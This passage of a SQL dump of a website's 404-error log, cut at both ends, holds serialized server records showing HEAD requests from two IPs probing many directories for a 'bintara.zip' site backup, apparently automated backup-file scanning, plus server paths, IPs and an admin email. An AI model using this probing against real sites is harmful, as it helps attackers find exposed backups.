e','2019-09-27 18:02:08','2019-09-27 18:01:26',35125736,36928320,'http://bintara.com.my/new/bintara.zip',1,0,'177.53.143.68'),(27245,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blogs/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/blogs/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blogs/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbgAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/blogs/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56560\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/blogs/bintara.zip\";s:10:\"SCRIPT_URL\";s:18:\"/blogs/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbgAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607283.9444\";s:12:\"REQUEST_TIME\";s:10:\"1569607283\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35124312,36925944,'http://bintara.com.my/blogs/bintara.zip',1,0,'177.53.143.68'),(27246,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/blog/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/blog/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/blog/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6AAAAVg\";s:12:\"REDIRECT_URL\";s:17:\"/blog/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56562\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/blog/bintara.zip\";s:10:\"SCRIPT_URL\";s:17:\"/blog/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6AAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.1438\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35129960,36922120,'http://bintara.com.my/blog/bintara.zip',1,0,'177.53.143.68'),(27247,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/v2/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/v2/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/v2/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFAAAAEU\";s:12:\"REDIRECT_URL\";s:15:\"/v2/bintara.zip\";s:11:\"REMOTE_ADDR\";s:14:\"103.14.122.123\";s:11:\"REMOTE_PORT\";s:5:\"55190\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/v2/bintara.zip\";s:10:\"SCRIPT_URL\";s:15:\"/v2/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFAAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.1746\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35124704,36931184,'http://bintara.com.my/v2/bintara.zip',1,0,'103.14.122.123'),(27248,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/beta/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/beta/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/beta/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX5wAAAVU\";s:12:\"REDIRECT_URL\";s:17:\"/beta/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56570\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/beta/bintara.zip\";s:10:\"SCRIPT_URL\";s:17:\"/beta/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX5wAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607283.9715\";s:12:\"REQUEST_TIME\";s:10:\"1569607283\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35129960,36922120,'http://bintara.com.my/beta/bintara.zip',1,0,'177.53.143.68'),(27249,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/1/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/1/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/1/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFgAAAEo\";s:12:\"REDIRECT_URL\";s:14:\"/1/bintara.zip\";s:11:\"REMOTE_ADDR\";s:14:\"103.14.122.123\";s:11:\"REMOTE_PORT\";s:5:\"55206\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/1/bintara.zip\";s:10:\"SCRIPT_URL\";s:14:\"/1/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VFgAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.2075\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35125672,36923544,'http://bintara.com.my/1/bintara.zip',1,0,'103.14.122.123'),(27250,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/test/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/test/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/test/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VDwAAAEw\";s:12:\"REDIRECT_URL\";s:17:\"/test/bintara.zip\";s:11:\"REMOTE_ADDR\";s:14:\"103.14.122.123\";s:11:\"REMOTE_PORT\";s:5:\"55172\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/test/bintara.zip\";s:10:\"SCRIPT_URL\";s:17:\"/test/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3HYVBlg0Ecqvi9VDwAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607283.7646\";s:12:\"REQUEST_TIME\";s:10:\"1569607283\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35127520,36934888,'http://bintara.com.my/test/bintara.zip',1,0,'103.14.122.123'),(27251,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/v1/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/v1/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/v1/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbAAAAJM\";s:12:\"REDIRECT_URL\";s:15:\"/v1/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56568\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/v1/bintara.zip\";s:10:\"SCRIPT_URL\";s:15:\"/v1/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc6TYgRwQdJ@9I7BUbAAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.0642\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:25',35124600,36929504,'http://bintara.com.my/v1/bintara.zip',1,0,'177.53.143.68'),(27252,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/website/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/website/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/website/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc9s@3O4E744khfb@UAAAAA8\";s:12:\"REDIRECT_URL\";s:20:\"/website/bintara.zip\";s:11:\"REMOTE_ADDR\";s:14:\"103.14.122.123\";s:11:\"REMOTE_PORT\";s:5:\"55168\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/website/bintara.zip\";s:10:\"SCRIPT_URL\";s:20:\"/website/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc9s@3O4E744khfb@UAAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569607283.667\";s:12:\"REQUEST_TIME\";s:10:\"1569607283\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:25',35127080,36927608,'http://bintara.com.my/website/bintara.zip',1,0,'103.14.122.123'),(27253,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/dev/bintara.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/dev/bintara.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/dev/bintara.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6gAAAVQ\";s:12:\"REDIRECT_URL\";s:16:\"/dev/bintara.zip\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.68\";s:11:\"REMOTE_PORT\";s:5:\"56552\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/dev/bintara.zip\";s:10:\"SCRIPT_URL\";s:16:\"/dev/bintara.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Oc3KlfXTtZ68oOVBX6gAAAVQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607284.2537\";s:12:\"REQUEST_TIME\";s:10:\"1569607284\";}}','notice','2019-09-27 18:02:08','2019-09-27 18:01:26',35125736,36928320,'http://bintara.com.my/dev/bintara.zip',1,0,'177.53.143.68'),(27254,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5SyXHYVBlg0Ecqvi9V4AAAAFQ\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:11:\"5.45.207.40\";s:11:\"REMOTE_PORT\";s:5:\"44991\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.